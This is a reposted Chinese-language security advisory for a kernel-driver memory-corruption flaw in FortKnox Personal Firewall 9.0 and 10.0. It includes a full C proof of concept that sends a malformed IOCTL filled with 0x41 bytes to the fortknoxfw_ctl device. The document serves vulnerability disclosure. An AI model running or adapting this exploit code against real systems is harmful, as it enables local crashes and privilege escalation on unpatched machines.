FortKnox Personal Firewall 'fortknoxfw.sys'驱动程序本地权

发布日期:2013-10-24
更新日期:2013-10-30

受影响系统:
fortknox-firewall fortknox-firewall 9.0.305.0
fortknox-firewall fortknox-firewall 10.0.305.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63372

FortKnox是个人防火墙解决方案。

FortKnox Personal Firewall 9.0.305.0、10.0.305.0的内核驱动程序fortknoxfw.sys存在内存破坏漏洞,本地攻击者可利用此漏洞以提升的权限执行任意代码。

<*来源:Arash Allebrahim
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include<stdio.h>
#include<windows.h>
#include<stdlib.h>
int main(int argc, char *argv[])
{
    BOOL res = FALSE;
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    BYTE obuff[0x98];
    ULONG inputBuffer;
    DWORD bts;
    hDevice = CreateFile("\\\\.\\fortknoxfw_ctl",
        GENERIC_READ|GENERIC_WRITE,
        FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_OVERLAPPED
        ,NULL);
    if(hDevice == INVALID_HANDLE_VALUE){
        printf("(-)Failure while File Creation!");
        exit(0);
    }else{
        printf("(+) trying to send the IO Control code to the device ...");
        inputBuffer = 0;
        memset(obuff,0x41,0x98);
        res = DeviceIoControl(hDevice,0x8e86200c,&inputBuffer,0x98,obuff,0x98,&bts,NULL);
        if(res==FALSE)
            printf("Failed while DeviceIoControl");
    }

return 0;
   
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

fortknox-firewall
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/5136ecea00a3baa7ebb2a368d6f31667.html